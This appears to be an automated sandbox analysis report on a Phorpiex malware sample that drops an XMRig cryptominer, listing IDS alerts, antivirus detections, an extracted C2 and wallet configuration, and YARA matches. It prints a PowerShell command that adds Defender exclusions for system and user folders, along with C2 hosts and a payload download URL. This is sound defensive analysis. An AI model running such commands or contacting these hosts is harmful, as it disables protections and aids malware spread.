                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3552, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 2052, ProcessName: powershell.exe
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-26T07:26:26.831139+020020220501A Network Trojan was detected185.215.113.6680192.168.2.649763TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-26T07:26:27.136621+020020220511A Network Trojan was detected185.215.113.6680192.168.2.649763TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-26T07:26:38.418676+020020440771A Network Trojan was detected192.168.2.65841585.173.115.18040500UDP
                                2024-10-26T07:26:43.408274+020020440771A Network Trojan was detected192.168.2.65841590.156.163.12140500UDP
                                2024-10-26T07:26:48.423353+020020440771A Network Trojan was detected192.168.2.65841562.209.135.14340500UDP
                                2024-10-26T07:26:53.488632+020020440771A Network Trojan was detected192.168.2.658415213.230.97.24140500UDP
                                2024-10-26T07:26:58.485911+020020440771A Network Trojan was detected192.168.2.65841593.188.83.23840500UDP
                                2024-10-26T07:27:08.517327+020020440771A Network Trojan was detected192.168.2.65841580.191.218.20940500UDP
                                2024-10-26T07:27:13.518977+020020440771A Network Trojan was detected192.168.2.65841585.233.153.10940500UDP
                                2024-10-26T07:27:18.542858+020020440771A Network Trojan was detected192.168.2.658415188.212.80.10540500UDP
                                2024-10-26T07:27:23.623498+020020440771A Network Trojan was detected192.168.2.65841590.156.160.6640500UDP
                                2024-10-26T07:27:33.626705+020020440771A Network Trojan was detected192.168.2.6584152.181.31.16740500UDP
                                2024-10-26T07:27:38.791276+020020440771A Network Trojan was detected192.168.2.65841577.240.41.340500UDP
                                2024-10-26T07:27:43.783471+020020440771A Network Trojan was detected192.168.2.658415151.243.242.9740500UDP
                                2024-10-26T07:27:48.799927+020020440771A Network Trojan was detected192.168.2.658415178.91.91.22540500UDP
                                2024-10-26T07:27:53.827913+020020440771A Network Trojan was detected192.168.2.65841591.246.92.2240500UDP
                                2024-10-26T07:27:58.869481+020020440771A Network Trojan was detected192.168.2.65841578.39.234.940500UDP
                                2024-10-26T07:28:08.907762+020020440771A Network Trojan was detected192.168.2.65841590.156.163.5540500UDP
                                2024-10-26T07:28:13.935566+020020440771A Network Trojan was detected192.168.2.65841594.158.52.9740500UDP
                                2024-10-26T07:28:18.924523+020020440771A Network Trojan was detected192.168.2.65841546.100.164.23940500UDP
                                2024-10-26T07:28:23.940145+020020440771A Network Trojan was detected192.168.2.658415213.206.45.22740500UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-26T07:26:13.686782+020028269302Crypto Currency Mining Activity Detected192.168.2.650008185.215.113.665152TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-26T07:26:36.856045+020028032742Potentially Bad Traffic192.168.2.649814185.215.113.6680TCP
                                2024-10-26T07:26:38.805924+020028032742Potentially Bad Traffic192.168.2.649826185.215.113.6680TCP
                                2024-10-26T07:26:44.437846+020028032742Potentially Bad Traffic192.168.2.649856185.215.113.6680TCP
                                2024-10-26T07:26:46.430096+020028032742Potentially Bad Traffic192.168.2.649867185.215.113.6680TCP
                                2024-10-26T07:26:53.054765+020028032742Potentially Bad Traffic192.168.2.649867185.215.113.6680TCP
                                2024-10-26T07:26:54.995499+020028032742Potentially Bad Traffic192.168.2.649914185.215.113.6680TCP
                                2024-10-26T07:27:01.531075+020028032742Potentially Bad Traffic192.168.2.649914185.215.113.6680TCP
                                2024-10-26T07:27:03.546764+020028032742Potentially Bad Traffic192.168.2.649957185.215.113.6680TCP
                                2024-10-26T07:27:09.917105+020028032742Potentially Bad Traffic192.168.2.649957185.215.113.6680TCP
                                2024-10-26T07:27:09.950937+020028032742Potentially Bad Traffic192.168.2.649991185.215.113.8480TCP
                                2024-10-26T07:27:11.870147+020028032742Potentially Bad Traffic192.168.2.649994185.215.113.6680TCP
                                2024-10-26T07:27:18.566079+020028032742Potentially Bad Traffic192.168.2.64999791.202.233.14180TCP
                                2024-10-26T07:27:20.278754+020028032742Potentially Bad Traffic192.168.2.64999891.202.233.14180TCP
                                2024-10-26T07:27:22.645557+020028032742Potentially Bad Traffic192.168.2.64999891.202.233.14180TCP
                                2024-10-26T07:27:25.002737+020028032742Potentially Bad Traffic192.168.2.64999891.202.233.14180TCP
                                2024-10-26T07:27:27.434450+020028032742Potentially Bad Traffic192.168.2.64999891.202.233.14180TCP
                                2024-10-26T07:27:29.749284+020028032742Potentially Bad Traffic192.168.2.64999891.202.233.14180TCP
                                2024-10-26T07:27:33.848197+020028032742Potentially Bad Traffic192.168.2.650000185.215.113.6680TCP
                                2024-10-26T07:27:36.812072+020028032742Potentially Bad Traffic192.168.2.650001185.215.113.6680TCP
                                2024-10-26T07:27:40.164023+020028032742Potentially Bad Traffic192.168.2.650004185.215.113.6680TCP
                                2024-10-26T07:27:43.131743+020028032742Potentially Bad Traffic192.168.2.650006185.215.113.6680TCP
                                2024-10-26T07:27:46.111661+020028032742Potentially Bad Traffic192.168.2.650007185.215.113.6680TCP
                                2024-10-26T07:27:50.560944+020028032742Potentially Bad Traffic192.168.2.65001091.202.233.14180TCP
                                2024-10-26T07:27:53.559330+020028032742Potentially Bad Traffic192.168.2.65001291.202.233.14180TCP
                                2024-10-26T07:27:56.509547+020028032742Potentially Bad Traffic192.168.2.65001391.202.233.14180TCP
                                2024-10-26T07:27:59.587464+020028032742Potentially Bad Traffic192.168.2.65001591.202.233.14180TCP
                                2024-10-26T07:28:02.679855+020028032742Potentially Bad Traffic192.168.2.65001691.202.233.14180TCP
                                2024-10-26T07:28:06.897629+020028032742Potentially Bad Traffic192.168.2.650018185.215.113.6680TCP
                                2024-10-26T07:28:09.853866+020028032742Potentially Bad Traffic192.168.2.650020185.215.113.6680TCP
                                2024-10-26T07:28:12.788861+020028032742Potentially Bad Traffic192.168.2.650021185.215.113.6680TCP
                                2024-10-26T07:28:15.799301+020028032742Potentially Bad Traffic192.168.2.650023185.215.113.6680TCP
                                2024-10-26T07:28:19.210121+020028032742Potentially Bad Traffic192.168.2.650025185.215.113.6680TCP
                                2024-10-26T07:28:23.377369+020028032742Potentially Bad Traffic192.168.2.65002791.202.233.14180TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-26T07:26:13.686782+020028376771A Network Trojan was detected185.215.113.6680192.168.2.649814TCP
                                2024-10-26T07:26:13.686782+020028376771A Network Trojan was detected185.215.113.6680192.168.2.650018TCP
                                2024-10-26T07:26:13.686782+020028376771A Network Trojan was detected185.215.113.6680192.168.2.650000TCP
                                2024-10-26T07:26:39.130562+020028376771A Network Trojan was detected185.215.113.6680192.168.2.649826TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-26T07:26:36.856045+020028482951A Network Trojan was detected192.168.2.649814185.215.113.6680TCP
                                2024-10-26T07:26:38.805924+020028482951A Network Trojan was detected192.168.2.649826185.215.113.6680TCP
                                2024-10-26T07:26:44.437846+020028482951A Network Trojan was detected192.168.2.649856185.215.113.6680TCP
                                2024-10-26T07:26:46.430096+020028482951A Network Trojan was detected192.168.2.649867185.215.113.6680TCP
                                2024-10-26T07:26:53.054765+020028482951A Network Trojan was detected192.168.2.649867185.215.113.6680TCP
                                2024-10-26T07:26:54.995499+020028482951A Network Trojan was detected192.168.2.649914185.215.113.6680TCP
                                2024-10-26T07:27:01.531075+020028482951A Network Trojan was detected192.168.2.649914185.215.113.6680TCP
                                2024-10-26T07:27:03.546764+020028482951A Network Trojan was detected192.168.2.649957185.215.113.6680TCP
                                2024-10-26T07:27:09.917105+020028482951A Network Trojan was detected192.168.2.649957185.215.113.6680TCP
                                2024-10-26T07:27:11.870147+020028482951A Network Trojan was detected192.168.2.649994185.215.113.6680TCP
                                2024-10-26T07:27:20.278754+020028482951A Network Trojan was detected192.168.2.64999891.202.233.14180TCP
                                2024-10-26T07:27:22.645557+020028482951A Network Trojan was detected192.168.2.64999891.202.233.14180TCP
                                2024-10-26T07:27:25.002737+020028482951A Network Trojan was detected192.168.2.64999891.202.233.14180TCP
                                2024-10-26T07:27:27.434450+020028482951A Network Trojan was detected192.168.2.64999891.202.233.14180TCP
                                2024-10-26T07:27:29.749284+020028482951A Network Trojan was detected192.168.2.64999891.202.233.14180TCP
                                2024-10-26T07:27:33.848197+020028482951A Network Trojan was detected192.168.2.650000185.215.113.6680TCP
                                2024-10-26T07:27:36.812072+020028482951A Network Trojan was detected192.168.2.650001185.215.113.6680TCP
                                2024-10-26T07:27:40.164023+020028482951A Network Trojan was detected192.168.2.650004185.215.113.6680TCP
                                2024-10-26T07:27:43.131743+020028482951A Network Trojan was detected192.168.2.650006185.215.113.6680TCP
                                2024-10-26T07:27:46.111661+020028482951A Network Trojan was detected192.168.2.650007185.215.113.6680TCP
                                2024-10-26T07:27:50.560944+020028482951A Network Trojan was detected192.168.2.65001091.202.233.14180TCP
                                2024-10-26T07:27:53.559330+020028482951A Network Trojan was detected192.168.2.65001291.202.233.14180TCP
                                2024-10-26T07:27:56.509547+020028482951A Network Trojan was detected192.168.2.65001391.202.233.14180TCP
                                2024-10-26T07:27:59.587464+020028482951A Network Trojan was detected192.168.2.65001591.202.233.14180TCP
                                2024-10-26T07:28:02.679855+020028482951A Network Trojan was detected192.168.2.65001691.202.233.14180TCP
                                2024-10-26T07:28:06.897629+020028482951A Network Trojan was detected192.168.2.650018185.215.113.6680TCP
                                2024-10-26T07:28:09.853866+020028482951A Network Trojan was detected192.168.2.650020185.215.113.6680TCP
                                2024-10-26T07:28:12.788861+020028482951A Network Trojan was detected192.168.2.650021185.215.113.6680TCP
                                2024-10-26T07:28:15.799301+020028482951A Network Trojan was detected192.168.2.650023185.215.113.6680TCP
                                2024-10-26T07:28:19.210121+020028482951A Network Trojan was detected192.168.2.650025185.215.113.6680TCP
                                2024-10-26T07:28:23.377369+020028482951A Network Trojan was detected192.168.2.65002791.202.233.14180TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nxmr[1].exeAvira: detection malicious, Label: HEUR/AGEN.1329646
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeAvira: detection malicious, Label: HEUR/AGEN.1329646
                                Source: C:\Users\user\AppData\Local\Temp\1239611256.exeAvira: detection malicious, Label: HEUR/AGEN.1329646
                                Source: C:\Users\user\AppData\Local\Temp\2314627202.exeAvira: detection malicious, Label: TR/Dldr.Agent.daypt
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrAvira: detection malicious, Label: HEUR/AGEN.1315882
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tdrpl[1].exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeAvira: detection malicious, Label: WORM/Phorpiex.olrti
                                Source: C:\Windows\sysppvrdnvs.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                                Source: 4.0.sysppvrdnvs.exe.400000.0.unpackMalware Configuration Extractor: Phorpiex {"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}
                                Source: http://185.215.113.84/nxmr.exepVirustotal: Detection: 14%Perma Link
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nxmr[1].exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tdrpl[1].exeReversingLabs: Detection: 81%
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Temp\1239611256.exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeReversingLabs: Detection: 55%
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeReversingLabs: Detection: 75%
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrReversingLabs: Detection: 81%
                                Source: C:\Users\user\AppData\Local\Temp\2314627202.exeReversingLabs: Detection: 57%
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpReversingLabs: Detection: 70%
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeReversingLabs: Detection: 76%
                                Source: C:\Windows\sysppvrdnvs.exeReversingLabs: Detection: 81%
                                Source: Us051y7j25.exeVirustotal: Detection: 41%Perma Link
                                Source: Us051y7j25.exeReversingLabs: Detection: 42%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nxmr[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1239611256.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tdrpl[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeJoe Sandbox ML: detected
                                Source: C:\Windows\sysppvrdnvs.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,3_2_0040C830
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,4_2_0040C830
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,18_2_0040C830

                                Phishing

                                barindex
                                Source: Yara matchFile source: 4.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.21324.scr.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.0.21324.scr.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000012.00000000.2471335406.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.2367149756.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.2346481586.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2367229368.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 21324.scr PID: 4416, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 1588, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 4492, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\21324.scr, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tdrpl[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\sysppvrdnvs.exe, type: DROPPED

                                Bitcoin Miner

                                barindex
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 34.2.winupsecvmgr.exe.7ff7ad1eca40.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.2.winupsecvmgr.exe.7ff7ad1b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.2.winupsecvmgr.exe.7ff7ad1f0320.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.2.winupsecvmgr.exe.7ff7ad1f0320.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000028.00000002.3515022371.000002640F711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: winupsecvmgr.exe PID: 4044, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED
                                Source: global trafficTCP traffic: 192.168.2.6:50008 -> 185.215.113.66:5152 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"47feq5mtn8mcl91sadm6ooigyfkddgftchftudhdqloyz4kps7jg19n1ua8eswuzometjqqkkkzr6nmcbuwa3htua2dee6e","pass":"x","agent":"xmrig/6.19.0 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
                                Source: winupsecvmgr.exe, 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: losestratum+tcp://
                                Source: winupsecvmgr.exe, 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: cryptonight/0
                                Source: winupsecvmgr.exe, 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: losestratum+tcp://
                                Source: winupsecvmgr.exe, 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                                Source: winupsecvmgr.exe, 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                                Source: winupsecvmgr.exe, 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                                Source: Us051y7j25.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\Desktop\Us051y7j25.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                                Source: Us051y7j25.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000001E.00000002.2890862563.000000D1C3D46000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: XC:\Windows\System.Management.Automation.pdb0 source: powershell.exe, 0000001E.00000002.2890862563.000000D1C3D46000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: winupsecvmgr.exe, 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmp
                                Source: Binary string: n.pdb{ source: powershell.exe, 0000001E.00000002.2937156312.0000025221AB2000.00000004.00000020.00020000.00000000.sdmp
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,3_2_004068E0
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_004067A0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_004068E0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_004067A0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,18_2_004068E0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,18_2_004067A0

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 85.173.115.180:40500
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 90.156.163.121:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:49856 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:49814 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:49867 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 62.209.135.143:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:49826 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 185.215.113.66:80 -> 192.168.2.6:49763
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 213.230.97.241:40500
